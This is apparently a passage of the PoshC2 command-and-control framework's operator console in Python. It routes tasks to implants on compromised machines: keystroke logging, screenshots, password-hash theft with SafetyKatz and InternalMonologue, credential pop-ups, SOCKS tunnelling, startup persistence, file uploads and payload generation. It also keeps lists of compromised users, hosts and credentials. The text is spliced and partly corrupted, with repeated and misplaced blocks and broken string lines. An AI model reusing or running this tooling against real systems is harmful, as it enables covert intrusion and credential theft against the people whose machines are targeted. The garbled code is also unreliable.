sharpurls.split(",") sharpurl = select_item("HostnameIP", "C2Server") print( POSHDIR + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input( "Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if ri == "": new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) if ri.lower() == "y": new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) elif (command.startswith("stop-keystrokes")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-keystrokes")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-screenshotmulti")): new_task(command, user, randomuri) elif (command.startswith("create-lnk")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("create-startuplnk")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-screenshot")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-hash")): check_module_loaded("InternalMonologue.exe", randomuri, user) new_task("run-exe InternalMonologue.Program InternalMonologue", user, randomuri) elif (command.startswith("arpscan")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("testadcredential")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("testlocalcredential")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("turtle")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-userinfo")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-computerinfo")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-dodgyprocesses")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-content")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("resolvednsname")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("resolveip")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("safetykatz")): new_task("run-exe SafetyKatz.Program %s" % command, user, randomuri) elif (command.startswith("cred-popper")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("get-serviceperms")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("copy ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("move ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("delete ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif command == "ls": new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.startswith("ls ")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif command == "pwd": new_task("run-exe Core.Program Core pwd", user, randomuri) elif command == "ps": new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri) elif command.startswith("loadmoduleforce"): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif command.startswith("loadmodule"): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif command.startswith("listmodules"): modules = os.listdir("%s/Modules/" % POSHDIR) print("") print("[+] Available modules:") print("") for mod in modules: if (".exe" in mod) or (".dll" in mod): print(mod) new_task(command, user, randomuri) elif command.startswith("modulesloaded"): ml = get_implantdetails(randomuri) print(ml[14]) elif command == "help" or command == "?": print(sharp_help1) elif command == "back" or command == "clear": startup(user) elif command.startswith("beacon") or command.startswith( "set-beacon") or command.startswith("setbeacon"): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print( "Invalid sleep command, please specify a time such as 50s, 10m or 1h" ) print(Colours.GREEN) else: new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) else: if command: new_task(original_command, user, randomuri) return
def commandloop(implant_id, user): while (True): try: style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.implant-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) implant_id_orig = implant_id if ("-" in implant_id) or ("all" in implant_id) or ("," in implant_id): print(Colours.GREEN) prompt_commands = COMMANDS command = session.prompt("%s> " % implant_id, completer=FirstWordFuzzyWordCompleter( prompt_commands, WORD=True)) else: hostname = get_hostdetails(implant_id) if not hostname: startup( user, "Unrecognised implant id or command: %s" % implant_id) prompt_commands = COMMANDS if hostname[15] == 'Python': prompt_commands = UXCOMMANDS if hostname[15] == 'C#': prompt_commands = SHARPCOMMANDS print(Colours.GREEN) print("%s\\%s @ %s (PID:%s)" % (hostname[11], hostname[2], hostname[3], hostname[8])) command = session.prompt( "%s %s> " % (get_implant_type_prompt_prefix(implant_id), implant_id), completer=FirstWordFuzzyWordCompleter(prompt_commands, WORD=True)) # if "all" run through all implants get_implants() if implant_id == "all": if command == "back": startup(user) allcommands = command if "\n" in command: ri = input( "Do you want to run commands seperately? (Y/n) ") implant_split = get_implants() if implant_split: for implant_id in implant_split: # if "\n" in command run each command individually or ask the question if thats what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: runcommand(command, implant_id[1], implant_id_orig) else: runcommand(command, implant_id[1], implant_id_orig) else: runcommand(command, implant_id[1], implant_id_orig) # if "seperated list" against single uri elif "," in implant_id: allcommands = command if "\n" in command: ri = input( "Do you want to run commands seperately? (Y/n) ") implant_split = implant_id.split(",") for implant_id in implant_split: implant_id = get_randomuri(implant_id) # if "\n" in command run each command individually or ask the question if thats what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: runcommand(command, implant_id, implant_id_orig) else: runcommand(command, implant_id, implant_id_orig) else: runcommand(command, implant_id, implant_id_orig) # if "range" against single uri elif "-" in implant_id: allcommands = command if "\n" in command: ri = input( "Do you want to run commands seperately? (Y/n) ") implant_split = implant_id.split("-") for implant_id in range(int(implant_split[0]), int(implant_split[1]) + 1): try: implant_id = get_randomuri(implant_id) # if "\n" in command run each command individually or ask the question if thats what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: runcommand(command, implant_id, implant_id_orig) else: runcommand(command, implant_id, implant_id_orig) else: runcommand(command, implant_id, implant_id_orig) except Exception: print("Unknown ImplantID") # else run against single uri else: allcommands = command if "\n" in command: ri = input( "Do you want to run commands seperately? (Y/n) ") implant_id = get_randomuri(implant_id) # if "\n" in command run each command individually or ask the question if thats what they want to do if "\n" in allcommands: if ri.lower() == "y" or ri == "": commands = allcommands.split('\n') for command in commands: runcommand(command, implant_id, implant_id_orig) else: runcommand(command, implant_id, implant_id_orig) else: runcommand(command, implant_id, implant_id_orig) # then run back around commandloop(implant_id_orig, user) except KeyboardInterrupt: commandloop(implant_id_orig, user) except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: print(Colours.RED) print( "Error running against the selected implant ID, ensure you have typed the correct information" ) print(Colours.GREEN) traceback.print_exc() print("Error: %s" % e) time.sleep(1) startup(user, user)
def startup(user, printhelp=""): session = PromptSession(history=FileHistory('%s/.top-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory()) try: if os.name == 'nt': os.system('cls') else: os.system('clear') except Exception: print("cls") print(chr(27) + "[2J") print(Colours.GREEN) print(logopic) try: if user is not None: print("User: "******"%s%s" % (user, Colours.GREEN)) print("") ii = get_implants() if ii: for i in ii: ID = i[0] LastSeen = i[7] Hostname = i[3] Domain = i[11] DomainUser = i[2] Arch = i[10] PID = i[8] Pivot = i[15] Sleep = i[13].strip() Label = i[16] Pivot = get_implant_type_prompt_prefix(ID) LastSeenTime = datetime.strptime(LastSeen, "%d/%m/%Y %H:%M:%S") now = datetime.now() if (Sleep.endswith('s')): sleep_int = int(Sleep[:-1]) elif (Sleep.endswith('m')): sleep_int = int(Sleep[:-1]) * 60 elif (Sleep.endswith('h')): sleep_int = int(Sleep[:-1]) * 60 * 60 else: print(Colours.RED) print("Incorrect sleep format: %s" % Sleep) print(Colours.GREEN) continue nowMinus3Beacons = now - timedelta(seconds=(sleep_int * 3)) nowMinus10Beacons = now - timedelta(seconds=(sleep_int * 10)) sID = "[" + str(ID) + "]" if not Label: sLabel = "" else: sLabel = "[" + Label + "]" if nowMinus10Beacons > LastSeenTime: print(Colours.RED + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot)) elif nowMinus3Beacons > LastSeenTime: print(Colours.YELLOW + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot)) else: print(Colours.GREEN + "%s%s: Seen:%s | PID:%s | %s | %s\\%s @ %s (%s) %s" % (sID.ljust(4), sLabel, LastSeen, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot)) else: now = datetime.now() print(Colours.RED + "No Implants as of: %s" % now.strftime("%d/%m/%Y %H:%M:%S")) if printhelp: print(printhelp) command = session.prompt( "\nSelect ImplantID or ALL or Comma Separated List (Enter to refresh):: ", completer=FirstWordFuzzyWordCompleter(PRECOMMANDS, WORD=True)) print("") command = command.strip() if (command == "") or (command == "back") or (command == "clear"): startup(user) if command.startswith("output-to-html"): startup( user, "This command has been retired, please use generate-reports") if command.startswith("generate-reports"): generate_table("Tasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") graphviz() time.sleep(1) startup(user) if command.startswith("message "): message = command[len("message "):] new_c2_message("Message from %s - %s" % (user, message)) startup(user) if command.startswith("show-urls") or command.startswith("list-urls"): urls = get_c2urls() urlformatted = "RandomID URL HostHeader ProxyURL ProxyUsername ProxyPassword CredentialExpiry\n" for i in urls: urlformatted += "%s %s %s %s %s %s %s %s \n" % ( i[0], i[1], i[2], i[3], i[4], i[5], i[6], i[7]) startup(user, urlformatted) if command.startswith("add-autorun"): if command == "add-autorun": startup(user, "Please specify a module to autorun") autorun = command.replace("add-autorun ", "") autorun = autorun.replace("add-autorun", "") add_autorun(autorun) startup(user, "add-autorun: %s\r\n" % autorun) if command.startswith("list-autorun"): autoruns = get_autorun() startup(user, autoruns) if command.startswith("del-autorun"): autorun = command.replace("del-autorun ", "") del_autorun(autorun) startup(user, "deleted autorun\r\n") if command.startswith("nuke-autorun"): del_autoruns() startup(user, "nuked autoruns\r\n") if (command == "automigrate-frompowershell") or (command == "am"): startup( user, "automigrate not currently implemented for the Python version of PoshC2\r\n" ) if command.startswith("show-serverinfo"): i = get_c2server_all() detailsformatted = "\nHostnameIP: %s\nEncKey: %s\nDomainFrontHeader: %s\nDefaultSleep: %s\nKillDate: %s\nHTTPResponse: %s\nFolderPath: %s\nServerPort: %s\nQuickCommand: %s\nDownloadURI: %s\nDefaultProxyURL: %s\nDefaultProxyUser: %s\nDefaultProxyPass: %s\nEnableSounds: %s\nAPIKEY: %s\nMobileNumber: %s\nURLS: %s\nSocksURLS: %s\nInsecure: %s\nUserAgent: %s\nReferer: %s\nAPIToken: %s\nAPIUser: %s\nEnableNotifications: %s\n" % ( i[1], i[2], i[3], i[4], i[5], i[6], i[7], i[8], i[9], i[10], i[11], i[12], i[13], i[14], i[15], i[16], i[17], i[18], i[19], i[20], i[21], i[22], i[23], i[24]) startup(user, detailsformatted) if command.startswith("turnoff-notifications"): update_item("EnableNotifications", "C2Server", "No") startup(user, "Turned off notifications on new implant") if command.startswith("turnon-notifications"): update_item("EnableNotifications", "C2Server", "Yes") startup(user, "Turned on notifications on new implant") if command.startswith("set-clockworksmsapikey"): cmd = command.replace("set-clockworksmsapikey ", "") cmd = cmd.replace("set-clockworksmsapikey", "") update_item("MobileNumber", "C2Server", cmd) startup(user, "Updated set-clockworksmsapikey: %s\r\n" % cmd) if command.startswith("set-clockworksmsnumber"): cmd = command.replace("set-clockworksmsnumber ", "") cmd = cmd.replace("set-clockworksmsnumber", "") update_item("APIKEY", "C2Server", cmd) startup( user, "Updated set-clockworksmsnumber (Restart C2 Server): %s\r\n" % cmd) if command.startswith("set-killdate"): cmd = command.replace("set-killdate ", "") cmd = cmd.replace("set-killdate", "") update_item("KillDate", "C2Server", cmd) startup( user, "Updated KillDate (Remember to generate new payloads and get new implants): %s\r\n" % cmd) if command.startswith("set-defaultbeacon"): new_sleep = command.replace("set-defaultbeacon ", "") new_sleep = new_sleep.replace("set-defaultbeacon", "") if not validate_sleep_time(new_sleep): print(Colours.RED) print( "Invalid sleep command, please specify a time such as 50s, 10m or 1h" ) print(Colours.GREEN) startup(user) else: update_item("DefaultSleep", "C2Server", new_sleep) startup( user, "Updated set-defaultbeacon (Restart C2 Server): %s\r\n" % new_sleep) if command.startswith("opsec"): implants = get_implants_all() comtasks = get_tasks() hosts = "" uploads = "" urls = "" users = "" for i in implants: if i[3] not in hosts: hosts += "%s \n" % i[3] if i[9] not in urls: urls += "%s \n" % i[9] for t in comtasks: hostname = get_implantdetails(t[1]) command = t[2].lower() output = t[3].lower() if hostname[2] not in users: users += "%s\\%s @ %s\n" % (hostname[11], hostname[2], hostname[3]) if "invoke-pbind" in command and "connected" in output: tg = re.search("(?<=-target )\\S*", str(command)) if tg[0] not in hosts: hosts += "%s \n" % tg[0] if "uploading file" in command: uploadedfile = command uploadedfile = uploadedfile.partition( "uploading file: ")[2].strip() filehash = uploadedfile.partition( " with md5sum:")[2].strip() uploadedfile = uploadedfile.partition( " with md5sum:")[0].strip() uploadedfile = uploadedfile.strip('"') uploads += "%s\t%s\t%s\n" % (hostname[3], filehash, uploadedfile) if "installing persistence" in output: implant_details = get_implantdetails(t[2]) line = command.replace('\n', '') line = line.replace('\r', '') filenameuploaded = line.rstrip().split(":", 1)[1] uploads += "%s %s \n" % (implant_details[3], filenameuploaded) if "written scf file" in output: implant_details = get_implantdetails(t[2]) uploads += "%s %s\n" % (implant_details[3], output[output.indexof(':'):]) creds, hashes = parse_creds(get_creds()) startup( user, "\nUsers Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (users, hosts, urls, uploads, creds, hashes)) if command.startswith("listmodules"): mods = "" for modname in os.listdir("%s/Modules/" % POSHDIR): mods += "%s\r\n" % modname startup(user, mods) if command == "creds": creds, hashes = parse_creds(get_creds()) startup( user, "\nCredentials Compromised: \n%s\nHashes Compromised: \n%s" % (creds, hashes)) if command.startswith("creds ") and "-add " in command: p = re.compile(r"-domain=([^\s]*)") domain = re.search(p, command) if domain: domain = domain.group(1) p = re.compile(r"-username=([^\s]*)") username = re.search(p, command) if username: username = username.group(1) p = re.compile(r"-password=([^\s]*)") password = re.search(p, command) if password: password = password.group(1) p = re.compile(r"-hash=([^\s]*)") hash = re.search(p, command) if hash: hash = hash.group(1) if not domain or not username: startup(user, "Please specify a domain and username") if password and hash: startup(user, "Please specify a password or a hash, but not both") if not password and not hash: startup(user, "Please specify either a password or a hash") insert_cred(domain, username, password, hash) startup(user, "Credential added successfully") if command.startswith("creds ") and "-search " in command: username = command.replace("creds ", "") username = username.replace("-search ", "") username = username.strip() creds, hashes = parse_creds(get_creds_for_user(username)) startup( user, "Credentials Compromised: \n%s\nHashes Compromised: \n%s" % (creds, hashes)) if (command == "pwnself") or (command == "p"): subprocess.Popen( ["python2.7", "%s%s" % (PayloadsDirectory, "py_dropper.py")]) startup(user) if (command == "tasks") or (command == "tasks "): alltasks = "" tasks = get_newtasks_all() if tasks is None: startup(user, "No tasks queued!\r\n") else: for task in tasks: imname = get_implantdetails(task[1]) alltasks += "[%s] : %s | %s\r\n" % ( imname[0], "%s\\%s" % (imname[11], imname[2]), task[2]) startup(user, "Queued tasks:\r\n\r\n%s" % alltasks) if (command == "cleartasks") or (command == "cleartasks "): drop_newtasks() startup(user, "Empty tasks queue\r\n") if command.startswith("quit"): ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "" or ri.lower() == "y": new_c2_message("%s logged off." % user) sys.exit(0) if command.startswith("createdaisypayload"): createdaisypayload(user, startup) if command.startswith("createproxypayload"): params = re.compile("createproxypayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if not creds['Password']: startup( user, "This command does not support credentials with hashes" ) createproxypayload(user, startup, creds) if command.startswith("createnewpayload"): params = re.compile("createnewpayload ", re.IGNORECASE) params = params.sub("", command) creds = None if "-credid" in params: creds, params = get_creds_from_params(params, startup, user) if creds is None: startup(user, "CredID not found") if not creds['Password']: startup( user, "This command does not support credentials with hashes" ) createnewpayload(user, startup, creds) if (command == "?") or (command == "help"): startup(user, pre_help) if (command == "history") or command == "history ": startup(user, get_history()) if command.startswith("use "): command = command.replace("use ", "") params = re.compile("use ", re.IGNORECASE) command = params.sub("", command) commandloop(command, user) except KeyboardInterrupt: startup(user) except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: if 'unable to open database file' in str(e): startup(user) else: traceback.print_exc() print("Error: %s" % e) print("Currently no valid implants: sleeping for 10 seconds") time.sleep(10) startup(user)
except KeyboardInterrupt: commandloop(implant_id_orig, user) except EOFError: new_c2_message("%s logged off." % user) sys.exit(0) except Exception as e: print(Colours.RED) print( "Error running against the selected implant ID, ensure you have typed the correct information" ) print(Colours.GREEN) traceback.print_exc() print("Error: %s" % e) time.sleep(1) startup(user, user) if __name__ == '__main__': original_sigint = signal.getsignal(signal.SIGINT) signal.signal(signal.SIGINT, catch_exit) parser = argparse.ArgumentParser( description='The command line for handling implants in PoshC2') parser.add_argument('-u', '--user', help='the user for this session') args = parser.parse_args() user = args.user while not user: print(Colours.GREEN + "A username is required for logging") user = input("Enter your username: "******"%s logged on." % user) startup(user)
def handle_py_command(command, user, randomuri, startup, implant_id, commandloop): command = command.strip() # alias mapping for alias in py_alias: if alias[0] == command[:len(command.rstrip())]: command = alias[1] if command.startswith("beacon") or command.startswith( "set-beacon") or command.startswith("setbeacon"): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print( "Invalid sleep command, please specify a time such as 50s, 10m or 1h" ) print(Colours.GREEN) else: command = '$sleeptime = %s' % new_sleep new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) elif command == "quit": ri = input("Are you sure you want to quit? (Y/n) ") if ri.lower() == "n": startup(user) if ri == "" or ri.lower() == "y": new_c2_message("%s logged off." % user) sys.exit(0) elif command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = py_help1.split('\n') for line in helpful: if searchterm in line.lower(): print(Colours.GREEN + line) elif command.startswith("unhide-implant"): unhide_implant(randomuri) elif command.startswith("hide-implant"): kill_implant(randomuri) elif command == 'sai' or command == 'migrate': new_task('startanotherimplant', user, randomuri) elif command.startswith("upload-file"): source = "" destination = "" s = "" if command == "upload-file": style = Style.from_dict({ '': '#80d130', }) session = PromptSession(history=FileHistory('%s/.upload-history' % ROOTDIR), auto_suggest=AutoSuggestFromHistory(), style=style) try: source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source except KeyboardInterrupt: commandloop(implant_id, user) while not os.path.isfile(source): print("File does not exist: %s" % source) source = session.prompt("Location file to upload: ", completer=FilePathCompleter( PayloadsDirectory, glob="*")) source = PayloadsDirectory + source destination = session.prompt("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination try: with open(source, "rb") as source_file: s = source_file.read() if s: sourceb64 = base64.b64encode(s).decode("utf-8") destination = destination.replace("\\", "\\\\") print("") print("Uploading %s to %s" % (source, destination)) uploadcommand = "upload-file \"%s\":%s" % (destination, sourceb64) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print("Error with source file: %s" % e) traceback.print_exc() elif command == "help" or command == "?": print(py_help1) elif command.startswith("loadmoduleforce"): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif command.startswith("loadmodule"): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif command.startswith("get-screenshot"): taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s" new_task(taskcmd, user, randomuri) elif command == "kill-implant" or command == "exit": impid = get_implantdetails(randomuri) ri = input( "Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print("Implant not terminated") if ri == "": pid = get_pid(randomuri) new_task("kill -9 %s" % pid, user, randomuri) kill_implant(randomuri) if ri.lower() == "y": pid = get_pid(randomuri) new_task("kill -9 %s" % pid, user, randomuri) kill_implant(randomuri) elif command == "back" or command == "clear": startup(user) elif command.startswith("linuxprivchecker"): params = re.compile("linuxprivchecker", re.IGNORECASE) params = params.sub("", command) module = open("%slinuxprivchecker.py" % ModulesDirectory, 'rb').read() encoded_module = base64.b64encode(module).decode("utf-8") taskcmd = "linuxprivchecker -pycode %s %s" % (encoded_module, params) new_task(taskcmd, user, randomuri) else: if command: new_task(command, user, randomuri) return